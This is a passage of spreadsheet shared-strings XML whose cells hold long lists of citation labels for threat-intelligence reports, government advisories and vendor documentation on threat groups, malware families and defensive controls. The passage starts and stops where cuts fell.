    <t>(Citation: Securelist ScarCruft Jun 2016),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Gigamon Berserk Bear October 2021),(Citation: ESET ComRAT May 2020),(Citation: Volexity Patchwork June 2018),(Citation: Secureworks REvil September 2019),(Citation: ESET Windigo Mar 2014),(Citation: Unit 42 ProjectM March 2016),(Citation: Symantec Leafminer July 2018),(Citation: ESET Buhtrap and Buran April 2019),(Citation: Symantec Elderwood Sept 2012),(Citation: ESET OceanLotus),(Citation: IBM Grandoreiro April 2020),(Citation: ESET LoudMiner June 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: TrendMicro New Andariel Tactics July 2018),(Citation: Talos Transparent Tribe May 2021),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: Cisco Group 72),(Citation: Secureworks IRON HUNTER Profile),(Citation: Kaspersky Darkhotel),(Citation: CSM Elderwood Sept 2012),(Citation: McAfee Sodinokibi October 2019),(Citation: Picus Sodinokibi January 2020),(Citation: Securelist Machete Aug 2014),(Citation: AhnLab Andariel Subgroup of Lazarus June 2018),(Citation: Securelist LuckyMouse June 2018),(Citation: MacKeeper Bundlore Apr 2019),(Citation: ESET RTM Feb 2017),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Security Affairs Elderwood Sept 2012),(Citation: FireEye APT38 Oct 2018),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Secureworks IRON LIBERTY July 2019),(Citation: Lookout Dark Caracal Jan 2018),(Citation: Google TAG Lazarus Jan 2021),(Citation: Cylance Dust Storm),(Citation: Secure List Bad Rabbit),(Citation: CISA AA20-239A BeagleBoyz August 2020),(Citation: Volexity Ocean Lotus November 2020),(Citation: objective-see windtail1 dec 2018),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: US-CERT TA18-074A),(Citation: RATANKBA),(Citation: Microsoft PLATINUM April 2016),(Citation: FireEye APT37 Feb 2018),(Citation: Bitdefender StrongPity June 2020),(Citation: Symantec Tick Apr 2016),(Citation: ESET Bad Rabbit),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: Secureworks IRON TWILIGHT Active Measures March 2017),(Citation: Secureworks GandCrab and REvil September 2019),(Citation: Dell TG-3390),(Citation: Symantec Patchwork),(Citation: Wikipedia Control Flow Integrity),(Citation: Windows Blogs Microsoft Edge Sandbox),(Citation: Ars Technica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET)</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: CheckPoint Redaman October 2019),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Unit 42 Gamaredon February 2022),(Citation: Talos Bisonal Mar 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: McAfee Night Dragon),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: McAfee Maze March 2020),(Citation: FireEye APT30),(Citation: ESET Operation Spalax Jan 2021),(Citation: Unit42 Redaman January 2019),(Citation: Cylance Dust Storm),(Citation: ESET Gelsemium June 2021),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: Cisco Umbrella DGA Brute Force),(Citation: Cybereason Dissecting DGAs)</t>
  </si>
  <si>
    <t>(Citation: Meyers Numbered Panda),</t>
  </si>
  <si>
    <t>(Citation: Talos CCleanup 2017),(Citation: ESET Sednit 2017 Activity),(Citation: ESET Dukes October 2019),(Citation: Cybereason Astaroth Feb 2019),(Citation: Trend Micro Conficker),(Citation: Zdnet Ngrok September 2018),(Citation: ESET Ebury Feb 2014),(Citation: FireEye POSHSPY April 2017),(Citation: Trend Micro Qakbot May 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Secureworks GOLD CABIN),(Citation: Cybereason Bazar July 2020),(Citation: Accenture Lyceum Targets November 2021),(Citation: ESET Grandoreiro April 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Unit 42 TA551 Jan 2021),(Citation: FireEye APT34 Dec 2017),(Citation: CheckPoint Naikon May 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: SANS Conficker),(Citation: ClearSky Siamesekitten August 2021),(Citation: Kaspersky ShadowPad Aug 2017),(Citation: Intezer Doki July 20),(Citation: BlackBerry CostaRicto November 2020),(Citation: ESET Ebury Oct 2017),(Citation: Securelist ShadowPad Aug 2017),(Citation: Cisco Umbrella DGA Brute Force),(Citation: Akamai DGA Mitigation),(Citation: Cybereason Dissecting DGAs)</t>
  </si>
  <si>
    <t>(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Korean FSI TA505 2020),(Citation: Trend Micro TA505 June 2019),(Citation: Gh0stRAT ATT March 2019),(Citation: Trend Micro njRAT 2018),</t>
  </si>
  <si>
    <t>(Citation: Certfa Charming Kitten January 2021),(Citation: DOJ Iran Indictments March 2018),(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)</t>
  </si>
  <si>
    <t>(Citation: DOJ Iran Indictments March 2018),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: CISA AA20-301A Kimsuky),(Citation: Microsoft BEC Campaign),(Citation: Pfammatter - Hidden Inbox Rules),(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)</t>
  </si>
  <si>
    <t>(Citation: F-Secure Cosmicduke),(Citation: Cybereason Kimsuky November 2020),(Citation: Talos Smoke Loader July 2018),(Citation: Trend Micro Qakbot December 2020),(Citation: Kaspersky QakBot September 2021),(Citation: Mandiant APT1),(Citation: McAfee Night Dragon),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: GitHub Pupy),(Citation: CIS Emotet Dec 2018),(Citation: Kroll Qakbot June 2020),(Citation: Trend Micro Muddy Water March 2021),(Citation: FireEye APT35 2018),(Citation: Github PowerShell Empire),(Citation: FireEye CARBANAK June 2017),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: KISA Operation Muzabi),(Citation: Cybereason Valak May 2020),(Citation: ESET LightNeuron May 2019),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Symantec Leafminer July 2018),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: Microsoft HAFNIUM March 2020),(Citation: Volexity SolarWinds),(Citation: Symantec Seaduke 2015),(Citation: NCC Group APT15 Alive and Strong),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: Volexity Exchange Marauder March 2021),(Citation: US-CERT TA18-074A),(Citation: GitHub MailSniper),(Citation: Microsoft NICKEL December 2021),(Citation: DOJ GRU Indictment Jul 2018),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Cybereason PowerLess February 2022),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: BiZone Lizar May 2021),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Gh0stRAT ATT March 2019),(Citation: Threatpost Lizar May 2021),(Citation: Cybereason Chaes Nov 2020),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: ESET DazzleSpy Jan 2022),(Citation: Red Canary NETWIRE January 2020),(Citation: Secureworks IRON HEMLOCK Profile),(Citation: SentinelOne Lazarus macOS July 2020),</t>
  </si>
  <si>
    <t>(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: NCSC Cyclops Blink February 2022),(Citation: Kaspersky Dridex May 2017),(Citation: Talos Promethium June 2020),(Citation: Secureworks Karagany July 2019),(Citation: CISA WellMail July 2020),(Citation: NCSC APT29 July 2020),(Citation: GitHub Pupy),(Citation: ESET GreyEnergy Oct 2018),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: CISA Zebrocy Oct 2020),(Citation: Invincea XTunnel),(Citation: ESET ComRAT May 2020),(Citation: Cylance Machete Mar 2017),(Citation: US-CERT Volgmer Nov 2017),(Citation: ESET Zebrocy May 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: ESET Kobalos Jan 2021),(Citation: Talos Cobalt Strike September 2020),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Juniper IcedID June 2020),(Citation: FireEye POSHSPY April 2017),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: IBM Grandoreiro April 2020),(Citation: Securelist APT10 March 2021),(Citation: Group IB Cobalt Aug 2017),(Citation: ESET Sednit Part 2),(Citation: Talos PoetRAT April 2020),(Citation: PWC WellMess C2 August 2020),(Citation: Github PowerShell Empire),(Citation: Bleeping Computer Op Sharpshooter March 2019),(Citation: Zscaler Bazar September 2020),(Citation: Mandiant APT1 Appendix),(Citation: CISA WellMess July 2020),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: PWC WellMess July 2020),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: FireEye FIN6 April 2016),(Citation: CISA ComRAT Oct 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: Bitdefender APT28 Dec 2015),(Citation: Trend Micro Emotet Jan 2019),(Citation: ESET Gazer Aug 2017),(Citation: Securelist WhiteBear Aug 2017),(Citation: Github Koadic),(Citation: Mythc Documentation),(Citation: IBM IcedID November 2017),(Citation: Leonardo Turla Penquin May 2020),(Citation: Blasco 2013),(Citation: SecureWorks WannaCry Analysis),(Citation: Intezer Doki July 20),(Citation: Fidelis Hi-Zor),(Citation: FireEye FiveHands April 2021),(Citation: FoxIT Wocao December 2019),(Citation: ESET Kobalos Feb 2021),(Citation: Group IB GrimAgent July 2021),(Citation: Kaspersky Sodin July 2019),(Citation: Accenture HyperStack October 2020),(Citation: GitHub Sliver Encryption),(Citation: BlackBerry CostaRicto November 2020),(Citation: Dingledine Tor The Second-Generation Onion Router),(Citation: Microsoft PLATINUM April 2016),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: ESET Attor Oct 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: Check Point Pay2Key November 2020),(Citation: Proofpoint TA505 Jan 2019),(Citation: Talos TinyTurla September 2021),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT28),(Citation: Microsoft DUBNIUM July 2016),(Citation: ESET InvisiMole June 2018),(Citation: McAfee Lazarus Nov 2020),(Citation: Check Point APT34 April 2021),(Citation: Lotus Blossom Jun 2015),(Citation: Carbon Black HotCroissant April 2020),(Citation: Proofpoint TA416 Europe March 2022),(Citation: Scarlet Mimic Jan 2016),(Citation: Volexity Patchwork June 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Proofpoint Bumblebee April 2022),(Citation: ESET Casbaneiro Oct 2019),(Citation: Baumgartner Naikon 2015),(Citation: ESET Sednit Part 2),(Citation: FireEye Poison Ivy),(Citation: PWC WellMess C2 August 2020),(Citation: FireEye APT33 Guardrail),(Citation: Unit42 Azorult Nov 2018),(Citation: CISA WellMess July 2020),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Securelist WhiteBear Aug 2017),(Citation: TrendMicro Taidoor),(Citation: Proofpoint Azorult July 2018),(Citation: Kaspersky Carbanak),(Citation: ESET RTM Feb 2017),(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Kaspersky Turla),(Citation: Villeneuve 2011),(Citation: ESET Kobalos Feb 2021),(Citation: MSTIC FoggyWeb September 2021),(Citation: GitHub Sliver Encryption),(Citation: Kaspersky QakBot September 2021),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Talos MuddyWater Jan 2022),(Citation: Malwarebytes KONNI Evolves Jan 2022),(Citation: Nccgroup Gh0st April 2018),(Citation: Proofpoint TA459 April 2017),(Citation: Dell Sakula),(Citation: Mandiant No Easy Breach),(Citation: McAfee GhostSecret),(Citation: Palo Alto Networks BBSRAT),(Citation: Palo Alto Comnie),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Chaos Stolen Backdoor),(Citation: F-Secure Cosmicduke),(Citation: CISA AppleJeus Feb 2021),(Citation: Talos Bisonal Mar 2020),(Citation: Lotus Blossom Dec 2015),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Bitdefender APT28 Dec 2015),(Citation: ESET Operation Groundbait),(Citation: Novetta Winnti April 2015),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Fidelis Hi-Zor),(Citation: CrowdStrike Putter Panda),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Rancor Unit42 June 2018),(Citation: ESET Okrum July 2019),(Citation: JPCert TSCookie March 2018),(Citation: Accenture HyperStack October 2020),(Citation: Proofpoint TA505 Mar 2018),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: Chronicle Winnti for Linux May 2019),(Citation: US-CERT BADCALL),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: Check Point APT35 CharmPower January 2022),(Citation: FireEye APT29),(Citation: Talos Frankenstein June 2019),(Citation: CrowdStrike IceApple May 2022),(Citation: FireEye APT10 Sept 2018),(Citation: Forcepoint Felismus Mar 2017),(Citation: FireEye APT10 April 2017),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: Checkpoint IndigoZebra July 2021),(Citation: ESET Zebrocy May 2019),(Citation: ESET LightNeuron May 2019),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: NCC Group Team9 June 2020),(Citation: PaloAlto NanoCore Feb 2016),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Cisco H1N1 Part 2),(Citation: Securelist APT10 March 2021),(Citation: Bitdefender Trickbot C2 infra Nov 2020),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: trendmicro xcsset xcode project 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: FireEye APT30),(Citation: Trend Micro Tick November 2019),(Citation: Palo Alto MoonWind March 2017),(Citation: PWC WellMess July 2020),(Citation: ESET ForSSHe December 2018),(Citation: US-CERT FALLCHILL Nov 2017),(Citation: ESET Gazer Aug 2017),(Citation: ESET Machete July 2019),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Check Point Warzone Feb 2020),(Citation: Unit42 RDAT July 2020),(Citation: Unit 42 Bisonal July 2018),(Citation: CheckPoint Bandook Nov 2020),(Citation: Zscaler Higaisa 2020),(Citation: ESET Sednit Part 3),(Citation: ESET Turla Mosquito Jan 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Fidelis TrickBot Oct 2016),(Citation: Novetta Blockbuster Destructive Malware),(Citation: ESET Attor Oct 2019),(Citation: GitHub QuasarRAT),(Citation: Fidelis Turbo),(Citation: US-CERT HOTCROISSANT February 2020),(Citation: Unit 42 PingPull Jun 2022),(Citation: Recorded Future REDDELTA July 2020),(Citation: Bitdefender Naikon April 2021),(Citation: Kaspersky Dridex May 2017),(Citation: Moran 2014),(Citation: ESET Dukes October 2019),(Citation: ESET GreyEnergy Oct 2018),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Novetta Blockbuster),(Citation: Kaspersky CactusPete Aug 2020),(Citation: ESET Ebury Feb 2014),(Citation: ESET Kobalos Jan 2021),(Citation: Talos Cobalt Strike September 2020),(Citation: Symantec W32.Duqu),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Novetta-Axiom),(Citation: JPCert PLEAD Downloader June 2018),(Citation: JPCERT ChChes Feb 2017),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Sofacy Komplex Trojan),(Citation: Security Intelligence More Eggs Aug 2019),(Citation: Unit 42 SeaDuke 2015),(Citation: Palo Alto OilRig May 2016),(Citation: ESET PipeMon May 2020),(Citation: Palo Alto menuPass Feb 2017),(Citation: FireEye CARBANAK June 2017),(Citation: Group IB GrimAgent July 2021),(Citation: Intezer HiddenWasp Map 2019),(Citation: Unit42 BendyBear Feb 2021),(Citation: US-CERT Volgmer 2 Nov 2017),(Citation: US-CERT KEYMARBLE Aug 2018),(Citation: Zscaler APT31 Covid-19 October 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: McAfee Lazarus Jul 2020),(Citation: Forcepoint Monsoon),(Citation: Symantec Hydraq Jan 2010),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: FireEye APT41 Aug 2019),(Citation: Talos ZxShell Oct 2014),(Citation: ESET Dukes October 2019),(Citation: CERT-EU DDoS March 2017)</t>
  </si>
  <si>
    <t>,(Citation: CERT-EU DDoS March 2017)</t>
  </si>
  <si>
    <t>(Citation: ESET Industroyer),(Citation: CERT-EU DDoS March 2017)</t>
  </si>
  <si>
    <t>(Citation: Intezer TeamTNT September 2020),(Citation: Aqua TeamTNT August 2020),(Citation: Unit 42 Siloscape Jun 2021),(Citation: Intezer Doki July 20),(Citation: Unit 42 Hildegard Malware),(Citation: Peirates GitHub),(Citation: Kubernetes Hardening Guide)</t>
  </si>
  <si>
    <t>(Citation: Check Point Pay2Key November 2020),(Citation: FireEye APT17),(Citation: ClearSky Pay2Kitten December 2020),</t>
  </si>
  <si>
    <t>(Citation: Google EXOTIC LILY March 2022),(Citation: DOJ Iran Indictments March 2018),(Citation: Kaspersky Lyceum October 2021),(Citation: CISA AA21-200A APT40 July 2021),(Citation: McAfee Honeybee),(Citation: Proofpoint TA453 March 2021),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Mandiant APT1),(Citation: Proofpoint TA416 Europe March 2022),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: KISA Operation Muzabi),(Citation: IBM ITG18 2020),(Citation: ESET Lazarus Jun 2020),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Dust Storm),(Citation: Kaspersky ThreatNeedle Feb 2021),</t>
  </si>
  <si>
    <t>(Citation: Volexity Ocean Lotus November 2020),(Citation: Dell Threat Group 2889),(Citation: Google EXOTIC LILY March 2022),(Citation: CISA AA21-200A APT40 July 2021),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: ClearSky Pay2Kitten December 2020),(Citation: ClearSky Kittens Back 3 August 2020),(Citation: KISA Operation Muzabi),(Citation: ESET Lazarus Jun 2020),(Citation: ClearSky Lazarus Aug 2020),(Citation: Google TAG Lazarus Jan 2021),</t>
  </si>
  <si>
    <t>(Citation: FireEye APT29 Domain Fronting),(Citation: RSA Shell Crew),(Citation: Mandiant No Easy Breach),(Citation: Novetta-Axiom),(Citation: FireEye APT41 Aug 2019),(Citation: aptsim),(Citation: Github PowerShell Empire),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: Beechey 2010),(Citation: TechNet RDP Gateway),(Citation: NSA MS AppLocker),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008),(Citation: TechNet RDP NLA),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Beechey 2010),(Citation: NSA MS AppLocker),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>(Citation: Palo Alto T9000 Feb 2016),(Citation: Eset Ramsay May 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: Trustwave Cherry Picker),(Citation: Beechey 2010),(Citation: NSA MS AppLocker),(Citation: TechNet Applocker vs SRP),(Citation: Windows Commands JPCERT),(Citation: Corio 2008),(Citation: Microsoft Windows Defender Application Control)</t>
  </si>
  <si>
    <t>(Citation: FOX-IT May 2016 Mofang),(Citation: Trustwave Pillowmint June 2020),(Citation: FireEye FIN7 Shim Databases),(Citation: Proofpoint TA505 October 2019),</t>
  </si>
  <si>
    <t>(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Securelist Kimsuky Sept 2013),</t>
  </si>
  <si>
    <t>(Citation: Medium KONNI Jan 2020),(Citation: Kaspersky WIRTE November 2021),(Citation: ESET Turla Mosquito Jan 2018),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Check Point Warzone Feb 2020),(Citation: ESET Sednit Part 2),(Citation: Palo Alto Networks BBSRAT),(Citation: Talos Seduploader Oct 2017),(Citation: ESET Sednit Part 1),(Citation: NorthSec 2015 GData Uroburos Tools),(Citation: ESET Zebrocy May 2019),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: FireEye TRITON 2019),(Citation: Proofpoint TA505 October 2019),</t>
  </si>
  <si>
    <t>(Citation: ObjectiveSee AppleJeus 2019),</t>
  </si>
  <si>
    <t>(Citation: Demaske Netsh Persistence),</t>
  </si>
  <si>
    <t>(Citation: ESET Turla PowerShell May 2019),</t>
  </si>
  <si>
    <t>(Citation: ESET Gazer Aug 2017),(Citation: TechNet Screensaver GP)</t>
  </si>
  <si>
    <t>(Citation: Anomali Linux Rabbit 2018),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: GitHub PoshC2),(Citation: FireEye WMI 2015),(Citation: FireEye POSHSPY April 2017),(Citation: Microsoft Holmium June 2020),(Citation: Bitdefender FIN8 July 2021),(Citation: ESET Turla PowerShell May 2019),(Citation: ESET Dukes October 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Mandiant No Easy Breach),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Microsoft PLATINUM April 2016),(Citation: Microsoft 365 Defender Solorigate),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: RedCanary Mockingbird May 2020),(Citation: FireEye APT33 Guardrail),(Citation: FireEye WMI 2015),(Citation: win10_asr)</t>
  </si>
  <si>
    <t>(Citation: Cyberreason Anchor December 2019),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: McAfee Lazarus Nov 2020),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Crowdstrike Indrik November 2018),(Citation: SentinelOne NobleBaron June 2021),</t>
  </si>
  <si>
    <t>(Citation: Microsoft Actinium February 2022),(Citation: Twitter ItsReallyNick APT41 EK),(Citation: Kaspersky Gauss Whitepaper),(Citation: Novetta Winnti April 2015),(Citation: ESET InvisiMole June 2020),(Citation: Volexity InkySquid RokRAT August 2021),(Citation: Kaspersky Equation QA),</t>
  </si>
  <si>
    <t>(Citation: 20 macOS Common Tools and Techniques),(Citation: Talos PoetRAT April 2020),(Citation: Symantec Hydraq Jan 2010),(Citation: Cybereason Chaes Nov 2020),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: ESET Kobalos Feb 2021),(Citation: Cisco Talos Intelligence Group),(Citation: TechNet Firewall Design)</t>
  </si>
  <si>
    <t>(Citation: Volexity SolarWinds),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: Rclone),(Citation: TechNet Firewall Design)</t>
  </si>
  <si>
    <t>,(Citation: TechNet Firewall Design)</t>
  </si>
  <si>
    <t>(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Novetta Blockbuster RATs),(Citation: ESET OceanLotus Mar 2019),(Citation: Novetta Blockbuster),(Citation: F-Secure Cosmicduke),(Citation: DFIR Ryuk's Return October 2020),(Citation: hexed osx.dok analysis 2019),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Talos Agent Tesla Oct 2018),(Citation: McAfee Gold Dragon),(Citation: Talos PoetRAT April 2020),(Citation: Symantec Thrip June 2018),(Citation: Trend Micro FIN6 October 2019),(Citation: Rclone),(Citation: Linux FTP),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: ESET ForSSHe December 2018),(Citation: Microsoft FTP),(Citation: Symantec Elfin Mar 2019),(Citation: Unit42 CookieMiner Jan 2019),(Citation: Trustwave Cherry Picker),(Citation: Palo Alto OilRig Oct 2016),(Citation: Microsoft BITSAdmin),(Citation: Kaspersky ProjectSauron Full Report),(Citation: Medium KONNI Jan 2020),(Citation: ESET Carbon Mar 2017),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: FireEye APT37 Feb 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Check Point APT35 CharmPower January 2022),(Citation: objective-see windtail2 jan 2019),(Citation: TechNet Firewall Design)</t>
  </si>
  <si>
    <t>(Citation: McAfee Lazarus Nov 2020),(Citation: Kaspersky Tomiris Sep 2021),(Citation: Check Point APT34 April 2021),(Citation: Carbon Black HotCroissant April 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: Cybereason Astaroth Feb 2019),(Citation: Scarlet Mimic Jan 2016),(Citation: Cybereason Valak May 2020),(Citation: Trend Micro njRAT 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: Prevailion EvilNum May 2020),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: ESET Sednit Part 2),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: ProofPoint Ursnif Aug 2016),(Citation: ESET Gelsemium June 2021),(Citation: ESET Crutch December 2020),(Citation: Trend Micro Emotet Jan 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Trusteer Carberp October 2010),(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: Leonardo Turla Penquin May 2020),(Citation: ClearSky Siamesekitten August 2021),(Citation: MSTIC FoggyWeb September 2021),(Citation: TrendMicro Ursnif Mar 2015),(Citation: McAfee Bankshot),(Citation: Kaspersky QakBot September 2021),(Citation: CrowdStrike Grim Spider May 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Bitdefender StrongPity June 2020),(Citation: Malwarebytes KONNI Evolves Jan 2022),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Google EXOTIC LILY March 2022),(Citation: Talos Promethium June 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: GitHub Pupy),(Citation: McAfee GhostSecret),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Securelist Octopus Oct 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Cybereason Soft Cell June 2019),(Citation: CISA AppleJeus Feb 2021),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Bisonal Mar 2020),(Citation: FireEye Ursnif Nov 2017),(Citation: Malwarebytes Dyreza November 2015),(Citation: Kaspersky WIRTE November 2021),(Citation: Github PowerShell Empire),(Citation: US-CERT HOPLIGHT Apr 2019),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: Unit 42 Valak July 2020),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Intezer Doki July 20),(Citation: Microsoft POLONIUM June 2022),(Citation: FoxIT Wocao December 2019),(Citation: Cylance Dust Storm),(Citation: ESET Okrum July 2019),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Unit42 Molerat Mar 2020),(Citation: SentinelOne Valak June 2020),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: BlackBerry CostaRicto November 2020),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CrowdStrike IceApple May 2022),(Citation: Talos Frankenstein June 2019),(Citation: Talos PoetRAT October 2020),(Citation: CISA Zebrocy Oct 2020),(Citation: FSecure Lokibot November 2019),(Citation: NTT Security Flagpro new December 2021),(Citation: Trustwave GoldenSpy June 2020),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Checkpoint IndigoZebra July 2021),(Citation: NSA/FBI Drovorub August 2020),(Citation: ESET LightNeuron May 2019),(Citation: Talos ROKRAT),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: trendmicro xcsset xcode project 2020),(Citation: ESET Telebots Dec 2016),(Citation: wardle evilquest partii),(Citation: Talos Kimsuky Nov 2021),(Citation: FireEye APT30),(Citation: ESET Grandoreiro April 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Talos Konni May 2017),(Citation: ESET ForSSHe December 2018),(Citation: ESET Machete July 2019),(Citation: McAfee Honeybee),(Citation: Cybereason StrifeWater Feb 2022),(Citation: Check Point Warzone Feb 2020),(Citation: Novetta Blockbuster Loaders),(Citation: NHS UK BLINDINGCAN Aug 2020),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Unit42 RDAT July 2020),(Citation: GitHub Sliver Download),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: CheckPoint Bandook Nov 2020),(Citation: ESET Industroyer),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: Zscaler Higaisa 2020),(Citation: FireEye HAWKBALL Jun 2019),(Citation: McAfee Sharpshooter December 2018),(Citation: Securelist Kimsuky Sept 2013),(Citation: FBI FLASH APT39 September 2020),(Citation: ESET Attor Oct 2019),(Citation: ESET DazzleSpy Jan 2022),(Citation: Unit 42 PingPull Jun 2022),(Citation: Cybereason Kimsuky November 2020),(Citation: Kaspersky TajMahal April 2019),(Citation: NCSC Cyclops Blink February 2022),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Unit 42 MechaFlounder March 2019),(Citation: Korean FSI TA505 2020),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: Symantec W.32 